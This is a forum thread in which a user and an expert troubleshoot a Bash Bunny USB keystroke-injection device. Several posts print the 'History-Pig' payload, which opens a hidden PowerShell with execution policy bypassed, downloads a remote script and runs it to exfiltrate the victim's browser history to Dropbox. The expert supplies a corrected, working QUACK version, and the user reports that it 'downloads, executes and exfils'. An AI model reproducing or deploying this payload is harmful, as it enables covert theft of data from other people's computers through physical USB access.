Jump to content

Bash Bunny no longer firing scripts on switch1 or switch2

baud

By baud
in Bash Bunny

 Share
Go to solution Solved by dark_pyrro,

Recommended Posts

baud Rookie

baud

Posted
Posted

Hello all,

I purchased a Bash Bunny a couple months ago and I just recently tried using it yesterday. It was working for the majority of the day and then suddenly the scripts just stopped firing on switch1 or switch2. I'm able to put it into arming mode just fine, and I know the scripts themselves work because they're directly from the github repo and they were working previously. When I plug in the Bash Bunny, the light turns green, then turns off and nothing happens. I've preformed a factory reset, the problem still persists. Please help.

File structure with no SD Card:

kp7pJdc.png

File structure with SD Card:

xGcOFy8.png

Link to comment
Share on other sites
dark_pyrro Grand Master

dark_pyrro

Posted
Posted
16 minutes ago, baud said:

then suddenly the scripts just stopped firing on switch1 or switch2

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?

Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
1 minute ago, dark_pyrro said:

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?

Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Interesting, so you don't put anything on the SD card at all? Everything should be stored directly on the bunny?

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
Just now, dark_pyrro said:

What payloads are you using in each switch position?

Currently the only one I'm using is History-Pig. If I copy/paste the powershell string into run it executes as expected, the bash bunny just never sends any keystrokes.

REM     Title: History-Pig

REM     Author: atomiczsec

REM     Description: This payload is meant to exfiltrate browsers history to a dropbox

REM     Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
ENTER

REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
12 minutes ago, dark_pyrro said:

Where's the ATTACKMODE?

I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
3 minutes ago, baud said:

I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

I see, it looks like I'd need to add ATTACKMODE HID, I'll give that a shot.

Link to comment
Share on other sites
dark_pyrro Grand Master

dark_pyrro

Posted
Posted

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add 

ATTACKMODE HID

to the top of the payload file

To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
5 minutes ago, dark_pyrro said:

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add 

ATTACKMODE HID

to the top of the payload file

To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Thanks, I added the following to the top, and it's at least changing to a red LED now but I still get no output. I suspect the issue lies with the script itself, I'll play around with it for a while. In regards to the dropbox piece, that all works fine. If I copy/paste the powershell string from the payload and manually run it in a run window, it downloads, executes and exfils and expected. Thanks again for your help, I'll report back if anything changes. 

LED R
ATTACKMODE HID
Link to comment
Share on other sites
dark_pyrro Grand Master

dark_pyrro

Posted
Posted

Something like this 

ATTACKMODE HID

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
QUACK ENTER

Perhaps also wrap the powershell line in quote marks and escape the dollar char as well 

QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"

 

Link to comment
Share on other sites
baud Rookie

baud

Posted
  • Author
Posted
6 minutes ago, dark_pyrro said:

Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.

You are the man, thanks so much. This gives me a much better understanding overall on how to use it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...